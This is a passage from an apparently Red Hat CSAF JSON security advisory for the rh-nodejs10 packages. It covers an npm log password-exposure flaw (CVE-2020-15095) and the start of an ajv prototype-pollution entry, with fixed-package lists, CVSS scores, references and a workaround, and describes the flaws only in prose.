"7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs: HTTP request smuggling via two copies of a header field in an http request" }, { "cve": "CVE-2020-15095", "cwe": { "id": "CWE-532", "name": "Insertion of Sensitive Information into Log File" }, "discovery_date": "2020-07-14T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1856875" } ], "notes": [ { "category": "description", "text": "Versions of the npm CLI prior to 6.14.6 are vulnerable to an information exposure vulnerability through log files. The CLI supports URLs like \"\u003cprotocol\u003e://[\u003cuser\u003e[:\u003cpassword\u003e]@]\u003chostname\u003e[:\u003cport\u003e][:][/]\u003cpath\u003e\". The password value is not redacted and is printed to stdout and also to any generated log files.", "title": "Vulnerability description" }, { "category": "summary", "text": "npm: sensitive information exposure through logs", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-15095" }, { "category": "external", "summary": "RHBZ#1856875", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1856875" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-15095", "url": "https://www.cve.org/CVERecord?id=CVE-2020-15095" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-15095", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15095" } ], "release_date": "2020-07-07T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-15T18:28:29+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0521" }, { "category": "workaround", "details": "Do not provide a password to npm via the cli to avoid it from being entered into the logs and stdout, or use ssh instead.", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "npm: sensitive information exposure through logs" }, { "cve": "CVE-2020-15366", "cwe": { "id": "CWE-471", "name": "Modification of Assumed-Immutable Data (MAID)" }, "discovery_date": "2020-07-15T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1857977" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ajv. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function", "title": "Vulnerability summary" }, { "category": "other", "text": "In both OpenShift Container Platform (OCP) and OpenShift ServiceMesh (OSSM), the affected containers are behind OpenShift OAuth authentication. This restricts access to the vulnerable nodejs-ajv library to authenticated users only, therefore the impact is low.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", 